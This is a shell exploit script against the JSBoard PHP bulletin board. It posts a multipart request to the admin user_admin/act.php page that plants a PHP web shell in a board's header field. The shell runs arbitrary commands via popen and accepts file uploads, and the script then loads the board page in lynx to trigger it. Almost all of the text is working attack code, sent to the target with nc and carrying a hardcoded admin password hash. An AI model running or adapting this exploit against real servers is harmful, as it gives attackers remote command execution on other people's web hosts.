#!/bin/sh
#usage: sh hook_js.sh <target host> <board_root> <directory relative to board_root/data directory>
#thanx to piranha for his php script
#example: sh hook_js.sh www.hacksware.com jsboard .

TARGET=$1
shift
JSBOARD_ROOT=$1
shift
DIRECTORY=$1
BROWER=lynx

sed "s/$/ /g" > .tmp.txt <<EOF
-----------------------------16816927778469308861804289383
Content-Disposition: form-data; name="passwd"

hello
-----------------------------16816927778469308861804289383
Content-Disposition: form-data; name="admin[passwd]"

dbvmoaTb1mocc
-----------------------------16816927778469308861804289383
Content-Disposition: form-data; name="table"

$DIRECTORY
-----------------------------16816927778469308861804289383
Content-Disposition: form-data; name="ua[passwd]"

.
-----------------------------16816927778469308861804289383
Content-Disposition: form-data; name="ua[repasswd]"

.
-----------------------------16816927778469308861804289383
Content-Disposition: form-data; name="ua[header]"

<?

// hi.. mat... I'm piranha... younggon@hotmail.com


echo("
    <form name='jackal' method=post action=\$PHP_SELF enctype=multipart/form-data>
    <table border='0' cellpadding='2' cellspacing='0' width='80%'>
    <tr>
	<td width =800>
	<form name='form' method='post'>
	<center>
	<input type=hidden name=mode value=command><br>
	<INPUT TYPE='hidden' NAME='o[at]' VALUE='s'><br>
	<input type='text' name='jackal' size='100' value=\$jackal> 
	<input name='userfile' size=86 type=file><br>
    <input name=submit type=submit value='o  k'>
	</center>
	</form>
	</td>
    </tr>
");

  if (\$userfile_name) {
       \$userfile_name = strtolower( \$userfile_name );
       copy( \$userfile, "\$userfile_name" );
	}

if(\$mode=='command')
{

        \$fp = popen("\$jackal", "r");
        while(!feof(\$fp))
        {
            \$result .= fgets(\$fp,100);
        }
        pclose(\$fp);


		echo("
<tr>
<center>\$jackal,\$userfile_name
<td width =800 bgcolor=00000>
<pre>
<font color='silver' size=2 face='fixedsys'>
\$result
</font>
</pre>
</td>
</center>
</tr>
<tr><td>&nbsp;</td></tr>
</table>
");
}
-----------------------------16816927778469308861804289383--
EOF

CONTENT_LENGTH=`wc -c .tmp.txt|sed -e "s/^[ ]*//g" -e "s/ .*$//g"`

nc $TARGET 80 <<EOF
POST /$JSBOARD_ROOT/admin/user_admin/act.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; U; Linux 2.4.0 i686; en-US; m18) Gecko/20001215
Host: $TARGET
Accept: */*
Accept-Language: ko
Accept-Encoding: gzip,deflate,compress,identity
Connection: Close
Content-type: multipart/form-data; boundary=---------------------------16816927778469308861804289383
Content-Length: $CONTENT_LENGTH

`cat .tmp.txt`
EOF

$BROWER http://$TARGET/$JSBOARD_ROOT/list.php?table=$DIRECTORY